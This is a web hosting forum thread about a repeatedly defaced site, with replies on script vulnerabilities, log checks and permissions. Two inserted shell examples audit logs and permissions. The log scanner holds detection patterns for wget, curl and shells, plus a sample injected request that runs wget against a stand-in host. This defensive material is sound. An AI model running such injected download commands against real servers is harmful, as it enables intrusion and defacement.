  1. #1

    Site Keeps Getting Hacked

    My site keeps getting hacked with this Infektion Group thing.

    http://t9xdesigns.ih0p.com/hacker.gif

    It's just the index files that keep getting hacked. So I just go into my ftp and replace them, but the hacker keeps on doing it. Is there anyway to stop this?

  2. #2
    Join Date
    Jan 2002
    Location
    Home, chair
    Posts
    723
    Do you have any cgi/php scripts on your site?

  3. #3
    Yeah, just scripts like a hit counter, image uploader, and stuff like that.

  4. #4
    Join Date
    Jan 2002
    Location
    Home, chair
    Posts
    723
    Well, one of them could be poorly written. My bet is it's the image uploader; it lets the attacker do the query injection and replace the index file on your site.

  5. #5
    I don't know, because the image uploader I use has a log with all the IPs and what everyone uploads, and all of them say either .gif, .jpeg, etc.

  6. #6
    Join Date
    Jan 2002
    Location
    Home, chair
    Posts
    723
    Well,
    check your site logs and see if you can find any tracks of how they replace your index page, but that they do it through a poorly coded script on your site is 99%.

  7. #7
    Join Date
    Aug 2002
    Posts
    512
    Just try and check your logs. If you can't find them or if you don't have them, ask your webhoster for help or just replace your scripts for a while. If they can hack it so far, they might hack you into trouble even more, so your site will be used for illegal transportation of files; you'd never know until you get a bandwidth bill.

  8. #8
    Check your folders;
    search for *.pl, *.cgi or *.php files that are not used.

    And see if index.html has 777 permissions; change it to 744 or 444.
    See if your PHP is in safe mode or not,
    and see the log file.

  9. #9
    Join Date
    Mar 2001
    Posts
    1,434
    grep "wget", "index", "bash", etc... in your weblog and see if anything comes up out of the ordinary. Probably escaping from one of your scripts and running commands directly on the server.

    Also check ps aux output to see if there are any long running scripts. chkrootkit would help as well.

    - John C.

  10. #10
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    for files in /usr/local/apache/domlogs/*; do grep "wget" "$files"; done;
    Do you have an old kernel?

    Depending on your Linux skills, I suggest hiring some help; there are many people here that can help. There's easyservermanagement.com, serveradmins.biz, linux-tech.net, wemanageservers.com, etc.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
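    The log-grepping advice in the two posts above (grep for "wget", "bash" and the like in the web logs), worked out as an added example that is not code from the thread or from any poster: a small POSIX shell script that pulls only the request field out of Apache combined-format access logs and flags lines containing downloaders, shells, path traversal or shell metacharacters. The log lines are constructed sample data; the IPs and paths in them are invented.

    ```shell
    #!/bin/sh
    # Added example, not from the thread: flag access-log requests that look like
    # command injection or tool downloads aimed at CGI/PHP scripts.
    # The five log lines below are constructed sample data (Apache combined format).

    SAMPLE_LOG="$(mktemp)"
    trap 'rm -f "$SAMPLE_LOG"' EXIT
    cat > "$SAMPLE_LOG" <<'EOF'
    203.0.113.5 - - [12/Mar/2004:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
    203.0.113.5 - - [12/Mar/2004:10:01:07 +0000] "GET /counter.cgi?page=home HTTP/1.1" 200 312 "-" "Mozilla/4.0"
    198.51.100.9 - - [12/Mar/2004:10:05:44 +0000] "GET /counter.cgi?page=;wget%20http://198.51.100.9/x HTTP/1.0" 200 312 "-" "-"
    198.51.100.9 - - [12/Mar/2004:10:05:51 +0000] "GET /upload.php?dir=../../public_html HTTP/1.0" 200 88 "-" "-"
    203.0.113.7 - - [12/Mar/2004:10:09:13 +0000] "POST /upload.php HTTP/1.1" 200 510 "-" "Mozilla/4.0"
    EOF

    # Lowercase extended regex applied to the request field only (field 2 when the
    # line is split on double quotes), so user-agent strings do not cause noise:
    # downloaders, shells, ../ traversal (plain or URL-encoded), ; and | separators.
    SUSPECT_RE='wget|curl|/bin/sh|bash|[.][.]/|%2e%2e|;|%3b|[|]'

    # Print "<client + timestamp>TAB<request>" for every suspect line in log $1.
    scan_log() {
        awk -F'"' -v re="$SUSPECT_RE" 'tolower($2) ~ re { print $1 "\t" $2 }' "$1"
    }

    # Number of suspect lines in log $1, printed to stdout (0 when none).
    count_suspect() {
        awk -F'"' -v re="$SUSPECT_RE" 'tolower($2) ~ re { n++ } END { print n + 0 }' "$1"
    }

    # Distinct client IPs behind suspect requests in log $1, one per line.
    suspect_ips() {
        awk -F'"' -v re="$SUSPECT_RE" 'tolower($2) ~ re { split($1, a, " "); print a[1] }' "$1" | sort -u
    }

    # Demo run over the constructed sample: two suspect lines, one source IP.
    scan_log "$SAMPLE_LOG"
    echo "suspect requests: $(count_suspect "$SAMPLE_LOG")"
    ```

    To use it on a real host, point the functions at the per-domain logs (the `/usr/local/apache/domlogs/*` path from the post above on cPanel boxes) instead of the sample file; the request matched in a real hit tells you which script is being abused, which is what the posters want the log check to reveal.
    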

  11. #11
    1) check kernel version (should be at least 2.4.25)
    2) check for problematic cgi/php scripts, mostly look for dangerous functions / places where you don't validate the information you get as an input from the browser
    3) have an up to date web server
    4) check that you don't have ports that are opened with no use on your server.
    5) check for known security problems on other services as well.

    see y'a

  12. #12
    Join Date
    Jun 2003
    Posts
    961
    If they are coming back often, check for rootkits (http://www.webhostingtalk.com/showth...hreadid=228109); maybe some backdoor is installed.

  13. #13
    Join Date
    Jul 2002
    Location
    Kuwait
    Posts
    10,573
    Secure your /tmp dir.

    If cPanel, run
    /scripts/securetmp

    ls -al /tmp; there should be something called
    /tmp/axp if I'm not mistaken, and something.cgi, not sure what the names are exactly.
    Bashar Al-Abdulhadi - KuwaitNET Internet Services Serving customers since 1997
    Kuwait's First Webhosting and Domain Registration provider - an ICANN Accredited Registrar

    Twitter: Bashar Al-Abdulhadi

  14. #14
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    11,687
    If it's just YOUR specific site that keeps getting hacked, it's most likely none of the above. Those would indicate the server itself being hacked, not your specific site.
    Steps to stop something like this are rather simple:
    A> Change your password and give it out to NOBODY
    B> Remove all scripts that you didn't specifically write. Most likely these are the cause of your hack. If you can't remove, then at least verify that they're secure. Most aren't.
    C> Change your public_html permissions so that only YOU can write to this folder, not nobody, not your group.
    D> Change your index_html so that only YOU can write to this file, not nobody, not your group.

    If you're running a bulletin board, then this most likely needs to be updated as well.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details
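    The permission advice in post #8 (index.html at 777, change it to 744 or 444) and in post #14 (public_html and index writable only by the owner, not by nobody or the group), as an added example that is not code from the thread or from any poster: a POSIX shell script that finds group- or world-writable paths under a web root and then strips those bits. The directory tree it audits is constructed sample data built in a temporary directory; the file names are invented.

    ```shell
    #!/bin/sh
    # Added example, not from the thread: audit a web root for files or directories
    # writable by group or others, then remove those write bits.
    # The tree below is constructed sample data in a temp dir.

    WEBROOT="$(mktemp -d)"
    trap 'rm -rf "$WEBROOT"' EXIT
    mkdir -p "$WEBROOT/public_html/images" "$WEBROOT/public_html/cgi-bin"
    echo '<html>ok</html>'  > "$WEBROOT/public_html/index.html"
    echo '#!/usr/bin/perl'  > "$WEBROOT/public_html/cgi-bin/counter.cgi"
    echo '<?php ?>'         > "$WEBROOT/public_html/upload.php"
    chmod 755 "$WEBROOT/public_html"
    chmod 777 "$WEBROOT/public_html/index.html"          # the bad case from the thread
    chmod 777 "$WEBROOT/public_html/images"              # upload dir left world-writable
    chmod 755 "$WEBROOT/public_html/cgi-bin/counter.cgi"
    chmod 644 "$WEBROOT/public_html/upload.php"

    # Paths under $1 with the group-write (020) or other-write (002) bit set, sorted.
    # Any of these can be modified by a web-server process running as nobody.
    writable_paths() {
        find "$1" \( -perm -020 -o -perm -002 \) -print | sort
    }

    # Number of such paths under $1, printed to stdout.
    count_writable() {
        writable_paths "$1" | wc -l | tr -d ' '
    }

    # Remediate: drop group/other write on every directory and file, then make
    # index files read-only (444, as post #8 suggests) so even the owner must
    # chmod deliberately before changing them.
    harden_webroot() {
        find "$1" -type d -exec chmod go-w {} +
        find "$1" -type f -exec chmod go-w {} +
        find "$1" -type f -name 'index.*' -exec chmod 444 {} +
    }

    # Mode string (first 10 chars of ls -ld) of path $1, e.g. -r--r--r--.
    mode_of() {
        ls -ld "$1" | cut -c1-10
    }

    # Demo run: report, fix, report again.
    echo "writable before hardening:"
    writable_paths "$WEBROOT"
    harden_webroot "$WEBROOT"
    echo "writable after hardening: $(count_writable "$WEBROOT")"
    ```

    Against a real account, replace the temp tree with the home directory and review the list before running the hardening step: an upload directory that the script genuinely must write into needs a narrower fix (owner-writable with the script running as the owner via suEXEC/suPHP, or a directory outside the document root) rather than a blanket chmod.
    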

  15. #15
    Join Date
    Apr 2003
    Location
    San Francisco, CA
    Posts
    428
    I bet it's your vBulletin:

    http://www.vbulletin.org/forum/showthread.php?t=59841

    This post, maybe:
    http://www.vbulletin.org/forum/showp...72&postcount=2

    Your calendar.php script maybe...

    HTH
    Hostito, Inc. - Web Hosting & Reseller Plans
    http://www.hostito.com
    [email protected] - 1 888 467 8486
